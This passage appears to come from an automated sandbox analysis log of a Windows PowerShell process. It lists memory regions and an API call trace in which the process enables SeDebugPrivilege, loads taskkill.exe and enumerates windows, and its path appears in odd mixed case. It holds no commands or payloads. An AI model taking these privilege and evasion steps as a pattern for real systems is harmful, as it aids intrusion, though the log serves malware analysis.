filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll")
Region:
id = 1818
start_va = 0x7fee1530000
end_va = 0x7fee1bd4fff
entry_point = 0x7fee1530000
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll")
Region:
id = 1819
start_va = 0x7fef1ae0000
end_va = 0x7fef1ae6fff
entry_point = 0x7fef1ae11a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 1862
start_va = 0x2740000
end_va = 0x2750fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002740000"
filename = ""
Region:
id = 1863
start_va = 0x2760000
end_va = 0x2760fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002760000"
filename = ""
Region:
id = 1864
start_va = 0x7fee1120000
end_va = 0x7fee12a3fff
entry_point = 0x7fee1206c60
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")
Region:
id = 1865
start_va = 0x7ff00180000
end_va = 0x7ff0018ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00180000"
filename = ""
Region:
id = 1866
start_va = 0x7ff00190000
end_va = 0x7ff0019ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00190000"
filename = ""
Region:
id = 1867
start_va = 0x7ff001a0000
end_va = 0x7ff001affff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001a0000"
filename = ""
Region:
id = 1868
start_va = 0x7ff001b0000
end_va = 0x7ff001bffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001b0000"
filename = ""
Region:
id = 1869
start_va = 0x7ff001c0000
end_va = 0x7ff001cffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001c0000"
filename = ""
Region:
id = 1870
start_va = 0x7ff001d0000
end_va = 0x7ff001dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001d0000"
filename = ""
Region:
id = 1871
start_va = 0x7ff001e0000
end_va = 0x7ff001effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001e0000"
filename = ""
Region:
id = 1887
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1888
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1889
start_va = 0x7ff001f0000
end_va = 0x7ff001fffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001f0000"
filename = ""
Region:
id = 1890
start_va = 0x7ff00200000
end_va = 0x7ff0020ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00200000"
filename = ""
Region:
id = 1891
start_va = 0x7ff00210000
end_va = 0x7ff0021ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00210000"
filename = ""
Region:
id = 1899
start_va = 0x1b8f0000
end_va = 0x1b9effff
entry_point = 0x0
region_type = private
name = "private_0x000000001b8f0000"
filename = ""
Region:
id = 1919
start_va = 0x2770000
end_va = 0x2770fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002770000"
filename = ""
Region:
id = 1920
start_va = 0x1b9f0000
end_va = 0x1bceefff
entry_point = 0x1bcbe7b4
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 1921
start_va = 0x7feddb30000
end_va = 0x7fede37afff
entry_point = 0x7feddb30000
region_type = mapped_file
name = "system.data.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll")
Region:
id = 1922
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1923
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1924
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1925
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1926
start_va = 0x7ff00220000
end_va = 0x7ff0022ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00220000"
filename = ""
Region:
id = 1927
start_va = 0x7ff00230000
end_va = 0x7ff0023ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00230000"
filename = ""
Region:
id = 1928
start_va = 0x7ff00240000
end_va = 0x7ff0024ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00240000"
filename = ""
Region:
id = 1935
start_va = 0x2860000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 1936
start_va = 0x2870000
end_va = 0x287ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 1937
start_va = 0x29c0000
end_va = 0x29cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 1938
start_va = 0x29d0000
end_va = 0x29dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029d0000"
filename = ""
Region:
id = 1939
start_va = 0x7ff00250000
end_va = 0x7ff0025ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00250000"
filename = ""
Region:
id = 1940
start_va = 0x7ff00260000
end_va = 0x7ff0026ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00260000"
filename = ""
Region:
id = 1960
start_va = 0x29f0000
end_va = 0x29fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029f0000"
filename = ""
Region:
id = 1961
start_va = 0x1be90000
end_va = 0x1c81ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001be90000"
filename = ""
Region:
id = 1962
start_va = 0xff470000
end_va = 0xff47ffff
entry_point = 0xff470000
region_type = mapped_file
name = "taskkill.exe"
filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe")
Region:
id = 1963
start_va = 0x7ff00270000
end_va = 0x7ff0027ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00270000"
filename = ""
Region:
id = 1964
start_va = 0x7fffff0e000
end_va = 0x7fffff0ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff0e000"
filename = ""
Region:
id = 1965
start_va = 0xff2a0000
end_va = 0xff2affff
entry_point = 0xff2a4290
region_type = mapped_file
name = "taskkill.exe"
filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe")
Region:
id = 2327
start_va = 0x29f0000
end_va = 0x29f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000029f0000"
filename = ""
Region:
id = 2328
start_va = 0x516f00000
end_va = 0x516fc5fff
entry_point = 0x516f24570
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll")
Region:
id = 2329
start_va = 0x2870000
end_va = 0x287ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 2330
start_va = 0x29c0000
end_va = 0x29cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 2331
start_va = 0x29d0000
end_va = 0x29dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029d0000"
filename = ""
Region:
id = 2332
start_va = 0x7fef1640000
end_va = 0x7fef168bfff
entry_point = 0x7fef1640000
region_type = mapped_file
name = "system.serviceprocess.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.ServiceProce#\\df4cc33bfe326b259eeef086451a2528\\System.ServiceProcess.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.serviceproce#\\df4cc33bfe326b259eeef086451a2528\\system.serviceprocess.ni.dll")
Thread:
id = 80
os_tid = 0x658
[0069.216] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0070.044] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.044] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.044] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0070.044] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0071.807] GetVersionExW (in: lpVersionInformation=0x16db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16db60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.808] GetVersionExW (in: lpVersionInformation=0x16db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16db60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.816] GetVersionExW (in: lpVersionInformation=0x16d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d8d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.816] SetErrorMode (uMode=0x1) returned 0x1
[0071.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16da30 | out: lpFileInformation=0x16da30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0071.847] SetErrorMode (uMode=0x1) returned 0x1
[0071.849] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dca0 | out: lpdwHandle=0x16dca0) returned 0x94c
[0071.850] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d280c8 | out: lpData=0x2d280c8) returned 1
[0071.851] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dc18, puLen=0x16dc10 | out: lplpBuffer=0x16dc18*=0x2d28164, puLen=0x16dc10) returned 1
[0071.853] lstrlenW (lpString="䅁") returned 1
[0071.858] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28240, puLen=0x16db80) returned 1
[0071.858] lstrlenW (lpString="Microsoft Corporation") returned 21
[0071.860] CoTaskMemAlloc (cb=0x2e) returned 0x2f3450
[0071.860] lstrcpyW (in: lpString1=0x2f3450, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0071.860] CoTaskMemFree (pv=0x2f3450)
[0071.860] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28294, puLen=0x16db80) returned 1
[0071.860] lstrlenW (lpString="System.Management.Automation") returned 28
[0071.860] CoTaskMemAlloc (cb=0x3c) returned 0x2f4780
[0071.860] lstrcpyW (in: lpString1=0x2f4780, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0071.860] CoTaskMemFree (pv=0x2f4780)
[0071.860] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d282f0, puLen=0x16db80) returned 1
[0071.860] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.860] CoTaskMemAlloc (cb=0x20) returned 0x2f0560
[0071.860] lstrcpyW (in: lpString1=0x2f0560, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.860] CoTaskMemFree (pv=0x2f0560)
[0071.860] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28330, puLen=0x16db80) returned 1
[0071.860] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.860] CoTaskMemAlloc (cb=0x44) returned 0x2f4780
[0071.860] lstrcpyW (in: lpString1=0x2f4780, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.861] CoTaskMemFree (pv=0x2f4780)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28398, puLen=0x16db80) returned 1
[0071.861] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0071.861] CoTaskMemAlloc (cb=0x76) returned 0x28ce10
[0071.861] lstrcpyW (in: lpString1=0x28ce10, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0071.861] CoTaskMemFree (pv=0x28ce10)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28434, puLen=0x16db80) returned 1
[0071.861] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.861] CoTaskMemAlloc (cb=0x44) returned 0x2f4780
[0071.861] lstrcpyW (in: lpString1=0x2f4780, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.861] CoTaskMemFree (pv=0x2f4780)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28498, puLen=0x16db80) returned 1
[0071.861] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0071.861] CoTaskMemAlloc (cb=0x58) returned 0x2e6680
[0071.861] lstrcpyW (in: lpString1=0x2e6680, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0071.861] CoTaskMemFree (pv=0x2e6680)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d28514, puLen=0x16db80) returned 1
[0071.861] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.861] CoTaskMemAlloc (cb=0x20) returned 0x2f0560
[0071.861] lstrcpyW (in: lpString1=0x2f0560, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.861] CoTaskMemFree (pv=0x2f0560)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x2d281bc, puLen=0x16db80) returned 1
[0071.861] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0071.861] CoTaskMemAlloc (cb=0x66) returned 0x2f8f90
[0071.861] lstrcpyW (in: lpString1=0x2f8f90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0071.861] CoTaskMemFree (pv=0x2f8f90)
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x0, puLen=0x16db80) returned 0
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x0, puLen=0x16db80) returned 0
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16db88, puLen=0x16db80 | out: lplpBuffer=0x16db88*=0x0, puLen=0x16db80) returned 0
[0071.861] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16db58, puLen=0x16db50 | out: lplpBuffer=0x16db58*=0x2d28164, puLen=0x16db50) returned 1
[0071.862] CoTaskMemAlloc (cb=0x204) returned 0x2bab30
[0071.862] VerLanguageNameW (in: wLang=0x0, szLang=0x2bab30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0071.864] CoTaskMemFree (pv=0x2bab30)
[0071.864] VerQueryValueW (in: pBlock=0x2d280c8, lpSubBlock="\\", lplpBuffer=0x16dba8, puLen=0x16dba0 | out: lplpBuffer=0x16dba8*=0x2d280f0, puLen=0x16dba0) returned 1
[0071.867] GetCurrentProcessId () returned 0x2ac
[0071.953] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cad0 | out: lpLuid=0x16cad0*(LowPart=0x14, HighPart=0)) returned 1
[0071.955] GetCurrentProcess () returned 0xffffffffffffffff
[0071.955] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16caf0 | out: TokenHandle=0x16caf0*=0x2f0) returned 1
[0071.956] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d2b940*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0071.966] CloseHandle (hObject=0x2f0) returned 1
[0071.969] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2ac) returned 0x2f0
[0071.977] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d2b9a8, cb=0x200, lpcbNeeded=0x16db08 | out: lphModule=0x2d2b9a8, lpcbNeeded=0x16db08) returned 1
[0071.979] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f630000, lpmodinfo=0x2d2bc18, cb=0x18 | out: lpmodinfo=0x2d2bc18*(lpBaseOfDll=0x13f630000, SizeOfImage=0x77000, EntryPoint=0x13f63c63c)) returned 1
[0071.979] CoTaskMemAlloc (cb=0x804) returned 0x2fc830
[0071.979] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f630000, lpBaseName=0x2fc830, nSize=0x800 | out: lpBaseName="PoWErSHELL.Exe") returned 0xe
[0071.980] CoTaskMemFree (pv=0x2fc830)
[0071.980] CoTaskMemAlloc (cb=0x804) returned 0x2fc830
[0071.980] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f630000, lpFilename=0x2fc830, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
[0071.980] CoTaskMemFree (pv=0x2fc830)
[0071.982] CloseHandle (hObject=0x2f0) returned 1
[0071.987] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x2ac) returned 0x2f0
[0071.987] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x16dc38 | out: lpExitCode=0x16dc38*=0x103) returned 1
[0071.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b088, Length=0x20000, ResultLength=0x16dc00 | out: SystemInformation=0x12d2b088, ResultLength=0x16dc00*=0xfeb8) returned 0x0
[0072.058] EnumWindows (lpEnumFunc=0x2ae66ac, lParam=0x0) returned 1
[0072.058] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x42c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x424
[0072.059] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x200f6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x530
[0072.059] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.059] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x55c
[0072.060] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x428
[0072.060] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x768
[0072.060] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x658
[0072.060] GetWindow (hWnd=0x1022c, uCmd=0x4) returned 0x0
[0072.061] IsWindowVisible (hWnd=0x1022c) returned 0
[0072.061] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x628
[0072.061] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x628
[0072.061] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x628
[0072.061] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbc4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x5001c, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbc4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbcc
[0072.061] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbcc
[0072.061] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbcc
[0072.061] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xbc4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x301b8, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x301b2, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0xa24
[0072.061] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
[0072.061] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16d960 | out: lpdwProcessId=0x16d960) returned 0x9b4
